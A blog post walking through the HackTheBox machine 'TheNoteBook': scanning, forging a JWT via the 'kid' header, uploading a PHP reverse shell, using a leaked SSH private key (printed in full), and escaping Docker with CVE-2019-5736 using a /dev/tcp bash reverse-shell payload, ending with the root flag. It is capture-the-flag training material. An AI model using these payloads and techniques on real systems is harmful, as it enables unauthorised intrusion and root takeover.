<!doctype html><html lang=en-us><head>
<script type=application/javascript>var doNotTrack=!1;doNotTrack||(function(a,e,f,g,b,c,d){a.GoogleAnalyticsObject=b,a[b]=a[b]||function(){(a[b].q=a[b].q||[]).push(arguments)},a[b].l=1*new Date,c=e.createElement(f),d=e.getElementsByTagName(f)[0],c.async=1,c.src=g,d.parentNode.insertBefore(c,d)}(window,document,'script','https://www.google-analytics.com/analytics.js','ga'),ga('create','UA-194024736-1','auto'),ga('send','pageview'))</script>
<meta charset=utf-8>
<title>TheNoteBook HackTheBox Walkthrough</title>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1">
<meta name=author content="Nasef">
<meta name=generator content="Hugo 0.87.0">
<link rel=stylesheet href=https://iamnasef.com/css/bootstrap.min.css>
<link rel=stylesheet href=https://iamnasef.com/font-awesome/css/font-awesome.min.css>
<link href=https://iamnasef.com/scss/style.min.css rel=stylesheet>
<link rel="shortcut icon" href=https://iamnasef.com/images/favicon.png type=image/x-icon>
<link rel=icon href=https://iamnasef.com/images/favicon.ico type=image/x-icon>
</head><body><nav class="navbar navbar-expand-lg site-navigation">
<div class=container>
<a class=navbar-brand href=https://iamnasef.com/>
<img src=https://iamnasef.com/images/logo.png alt=logo>
</a>
<button class="navbar-toggler collapsed" type=button data-toggle=collapse data-target=#sitenavbar>
<span class=icon-bar></span>
<span class=icon-bar></span>
<span class=icon-bar></span>
</button>
<div class="collapse navbar-collapse" id=sitenavbar>
<ul class="navbar-nav ml-auto main-nav">
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/>Home</a>
</li>
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/projects>Projects</a>
</li>
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/courses>Courses</a>
</li>
<li class=nav-item>
<a class=nav-link href=https://iamnasef.com/blog>Blog</a>
</li>
<li class=nav-item>
<a class="nav-link btn btn-sm btn-primary btn-sm-rounded" href=https://iamnasef.com/contact>
<span class=btn-area>
<span data-text="Contact Me">
Contact Me
</span>
</span>
</a>
</li>
</ul>
</div>
</div>
</nav>
<main>
<section class="site-blog details">
<div class=container>
<div class="row justify-content-center">
<div class=col-lg-8>
<article class=site-blog-details>
<h2 class=blog-title>TheNoteBook HackTheBox Walkthrough</h2>
<p><span>July 31, 2021</span> by <span>Nasef</span></p>
<img class=feature-image src=https://iamnasef.com/images/blog/012/featured-image.png alt=blog-feature-image>
<p>Hello everybody!
I am Nasef and today I am going to show you how I hacked TheNoteBook machine from hack the box, so let&rsquo;s get started!</p>
<h3 id=recon>Recon</h3>
<h5 id=nmap>nmap</h5>
<p>Nmap found ssh (22), http (80)</p>
<pre><code>nmap -sC -sV 10.10.10.230     
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 11:57 EDT
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 11:59 (0:00:06 remaining)
Nmap scan report for 10.10.10.230
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.65 seconds
</code></pre><h5 id=http-80>http (80)</h5>
<p>First, I made an account in the website, and made some notes to know how exactly everything works</p>
<p><img src=/images/blog/012/1.png alt=image></p>
<p>I had multiple guess about exploiting this web application: -</p>
<ol>
<li>There is some hidden note which contains a credentials (Failed after multiple fuzzing)</li>
<li>IDOR where I can access admin notes (Failed)</li>
<li>SQL Injection (Failed)</li>
<li>SSTI (Failed)</li>
</ol>
<p>Then I opened the cookies and found JWT Token so I used <a href=https://jwt.io/#debugger-io>This website</a> to decoded it.</p>
<p><img src=/images/blog/012/2.png alt=image></p>
<p>I found a key called admin_cap set to false. Maybe if we can set it to true, we can get into admin account.
I tried it but it kept failing until I read <a href=https://blog.pentesteracademy.com/hacking-jwt-tokens-kid-claim-misuse-key-leak-e7fce9a10a9c>This Article</a></p>
<p>It seems that the key kid is used to verify the signature, and it points to a key on the webserver.</p>
<p>An Attack scenario hit me</p>
<ol>
<li>Create private key <code>openssl genrsa -out rsa.private 1024</code></li>
<li>modify both admin_cap to true and kid to the private key I created <code>python -m SimpleHTTPServer 7070</code></li>
<li>Replace the generated token with original token</li>
</ol>
<p><img src=/images/blog/012/3.png alt=image></p>
<p>It worked!</p>
<p><img src=/images/blog/012/4.png alt=image></p>
<p>I found an upload functionality, so I started reverse shell <code>nc -lvnp 5555</code>, then uploaded pentester monkey php reverse shell and got initial shell</p>
<pre><code>nc -lvnp 5555            
listening on [any] 5555 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.230] 44594
Linux thenotebook 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 15:30:52 up  3:15,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

</code></pre><h3 id=getting-into-noah>Getting into noah</h3>
<p>I&rsquo;ve ran linpeas, and found and ssh keys stored in home directory of a user called noah</p>
<pre><code>╔══════════╣ Analizing SSH FILES Files (limit 70)
id_dsa* Not Found                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
-rw------- 1 www-data www-data 1679 Feb 17 08:59 /tmp/key/home/noah/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAyqucvz6P/EEQbdf8cA44GkEjCc3QnAyssED3qq9Pz1LxEN04
HbhhDfFxK+EDWK4ykk0g5MvBQckcxAs31mNnu+UClYLMb4YXGvriwCrtrHo/ulwT
rLymqVzxjEbLUkIgjZNW49ABwi2pDfzoXnij9JK8s3ijIo+w/0RqHzAfgS3Y7t+b
HVo4kvIHT0IXveAivxez3UpiulFkaQ4zk37rfHO3wuTWsyZ0vmL7gr3fQRBndrUD
v4k2zwetxYNt0hjdLDyA+KGWFFeW7ey9ynrMKW2ic2vBucEAUUe+mb0EazO2inhX
rTAQEgTrbO7jNoZEpf4MDRt7DTQ7dRz+k8HG4wIDAQABAoIBAQDIa0b51Ht84DbH
+UQY5+bRB8MHifGWr+4B6m1A7FcHViUwISPCODg6Gp5o3v55LuKxzPYPa/M0BBaf
Q9y29Nx7ce/JPGzAiKDGvH2JvaoF22qz9yQ5uOEzMMdpigS81snsV10gse1bQd4h
CA4ehjzUultDO7RPlDtbZCNxrhwpmBMjCjQna0R2TqPjEs4b7DT1Grs9O7d7pyNM
Um/rxjBx7AcbP+P7LBqLrnk7kCXeZXbi15Lc9uDUS2c3INeRPmbFl5d7OdlTbXce
YwHVJckFXyeVP6Qziu3yA3p6d+fhFCzWU3uzUKBL0GeJSARxISsvVRzXlHRBGU9V
AuyJ2O4JAoGBAO67RmkGsIAIww/DJ7fFRRK91dvQdeaFSmA7Xf5rhWFymZ/spj2/
rWuuxIS2AXp6pmk36GEpUN1Ea+jvkw/NaMPfGpIl50dO60I0B4FtJbood2gApfG9
0uPb7a+Yzbj10D3U6AnDi0tRtFwnnyfRevS+KEFVXHTLPTPGjRRQ41OdAoGBANlU
kn7eFJ04BYmzcWbupXaped7QEfshGMu34/HWl0/ejKXgVkLsGgSB5v3aOlP6KqEE
vk4wAFKj1i40pEAp0ZNawD5TsDSHoAsIxRnjRM+pZ2bjku0GNzCAU82/rJSnRA+X
i7zrFYhfaKldu4fNYgHKgDBx8X/DeD0vLellpLx/AoGBANoh0CIi9J7oYqNCZEYs
QALx5jilbzUk0WLAnA/eWs9BkVFpQDTnsSPVWscQLqWk7+zwIqq0v6iN3jPGxA8K
VxGyB2tGqt6jI58oPztpabGBTCmBfh82nT2KNNHfwwmfwZjdsu9I9zvo+e3CXlBZ
vglmvw2DW6l0EwX+A+ZuSmiZAoGAb2mgtDMrRDHc/Oul3gvHfV6CYIwwO5qK+Jyr
2WWWKla/qaWo8yPQbrEddtOyBS0BP4yL9s86yyK8gPFxpocJrk3esdT7RuKkVCPJ
z2yn8QE6Rg+yWZpPHqkazSZO1eItzQR2mYG2hzPKFtE7evH6JUrnjm5LTKEreco+
8iCuZAcCgYEA1fhcJzNwEUb2EOV/AI23rYpViF6SiDTfJrtV6ZCLTuKKhdvuqkKr
JjwmBxv0VN6MDmJ4OhYo1ZR6WiTMYq6kFGCmSCATPl4wbGmwb0ZHb0WBSbj5ErQ+
Uh6he5GM5rTstMjtGN+OQ0Z8UZ6c0HBM0ulkBT9IUIUEdLFntA4oAVQ=
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 www-data www-data 398 Feb 17 08:59 /tmp/key/home/noah/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKq5y/Po/8QRBt1/xwDjgaQSMJzdCcDKywQPeqr0/PUvEQ3TgduGEN8XEr4QNYrjKSTSDky8FByRzECzfWY2e75QKVgsxvhhca+uLAKu2sej+6XBOsvKapXPGMRstSQiCNk1bj0AHCLakN/OheeKP0kryzeKMij7D/RGofMB+BLdju35sdWjiS8gdPQhe94CK/F7PdSmK6UWRpDjOTfut8c7fC5NazJnS+YvuCvd9BEGd2tQO/iTbPB63Fg23SGN0sPID4oZYUV5bt7L3KeswpbaJza8G5wQBRR76ZvQRrM7aKeFetMBASBOts7uM2hkSl/gwNG3sNNDt1HP6Twcbj noah@thenotebook
</code></pre><p>So, I ssh&rsquo;d into noah</p>
<pre><code>ssh noah@10.10.10.230 -i id_rsa
</code></pre><h3 id=getting-into-root>Getting into Root</h3>
<p>I ran sudo -l and found I was able to run commands in a docker container called webapp-dev01 as root without password</p>
<pre><code>noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

</code></pre><p>so, I ran <code>sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash</code> to get the root in the container</p>
<p>I searched for an docker escape for this case and found <a href=https://github.com/Frichetten/CVE-2019-5736-PoC>This Exploit</a></p>
<p>I modified the exploit to be able to make a reverse shell.</p>
<pre><code>var payload = &quot;#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/10.10.14.115/9999 0&gt;&amp;1&quot;
</code></pre><p>The started a reverse shell, and ran the exploit as explained in the README.md</p>
<pre><code>nc -lvnp 9999            
listening on [any] 9999 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.230] 36990
bash: cannot set terminal process group (1636): Inappropriate ioctl for device
bash: no job control in this shell
&lt;4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# whoami
whoami
root
&lt;4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# cd /root
cd /rootl
root@thenotebook:/root# s
ls
cleanup.sh
docker-runc
reset.sh
root.txt
start.sh
root@thenotebook:/root# cat root.txt
cat root.txt
d656b0a679e50b99406b11816159abb1

</code></pre><p>Thank you for reading!</p>
</article>
</div>
</div>
</div>
</section>
<section class=site-cta id=contact style=background-image:url(https://iamnasef.com/images/backgrounds/cta-background.jpg)>
<div class=container>
<div class=row>
<div class="col-12 text-center">
<h1 class=site-cta-title>SAY HELLO</h1>
<a class=mail-link href=mailto:hello@iamnasef.com><h2 class=mail>HELLO@IAMNASEF.COM</h2></a>
<div class=sm-links>
<a href=https://twitter.com/iamnasef><i class="fa fa-twitter-square" aria-hidden=true></i></a>
<a href=https://www.linkedin.com/in/iamnasef/><i class="fa fa-linkedin-square" aria-hidden=true></i></a>
<a href=https://github.com/iamnasef><i class="fa fa-github-square" aria-hidden=true></i></a>
<a href=https://www.youtube.com/channel/UCoxP4Z6Wfz60fFtB31gyNlQ><i class="fa fa-youtube-square" aria-hidden=true></i></a>
</div>
</div>
</div>
</div>
</section>
</main><footer class=site-footer>
<div class=container>
<div class=row>
<div class=col-12>
<div class=site-footer-logo><a href=https://iamnasef.com/><img src=https://iamnasef.com/images/logo-footer.png alt=logo-footer width=100px height=100px></a></div>
</div>
<div class="col-lg-3 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Contact Info</h5>
<p class=site-footer-widget-description>
<a href=mailto:hello@iamnansef.com>hello@iamnansef.com</a>
</p>
</div>
</div>
<div class="col-lg-2 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Check it</h5>
<ul class=site-footer-widget-links>
<li><a href=https://iamnasef.com/blog>Blog</a></li>
<li><a href=https://iamnasef.com/projects>Projects</a></li>
<li><a href=https://iamnasef.com/courses>Courses</a></li>
<li><a href=https://iamnasef.com/contact>Contact</a></li>
</ul>
</div>
</div>
<div class="col-lg-2 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Social Media</h5>
<ul class=site-footer-widget-links>
<li><a href=https://www.linkedin.com/in/iamnasef/>Linkedin</a></li>
<li><a href=https://twitter.com/iamnasef>Twitter</a></li>
<li><a href=https://github.com/iamnasef>Github</a></li>
<li><a href=https://www.youtube.com/channel/UCoxP4Z6Wfz60fFtB31gyNlQ>YouTube</a></li>
</ul>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class=site-footer-widget>
<h5 class=site-footer-widget-title>Keeping you safe</h5>
<p class=site-footer-widget-description>
Application Security Engineering<br>Cyber Security Technical Training<br>Cyber Security Awarness
</p>
</div>
</div>
<div class="col-lg-2 col-12">
<a href=#top class=site-footer-widget-top>
<img src=https://iamnasef.com/images/to-top.svg alt=back-to-top>
<p>
I want to
<br>
visit again
</p>
</a>
</div>
</div>
</div>
</footer>
<script src=https://iamnasef.com/js/formhandler.min.js></script>
<script src=https://iamnasef.com/js/vendor.min.js></script>
<script src=https://iamnasef.com/js/script.min.js></script></body>
</html>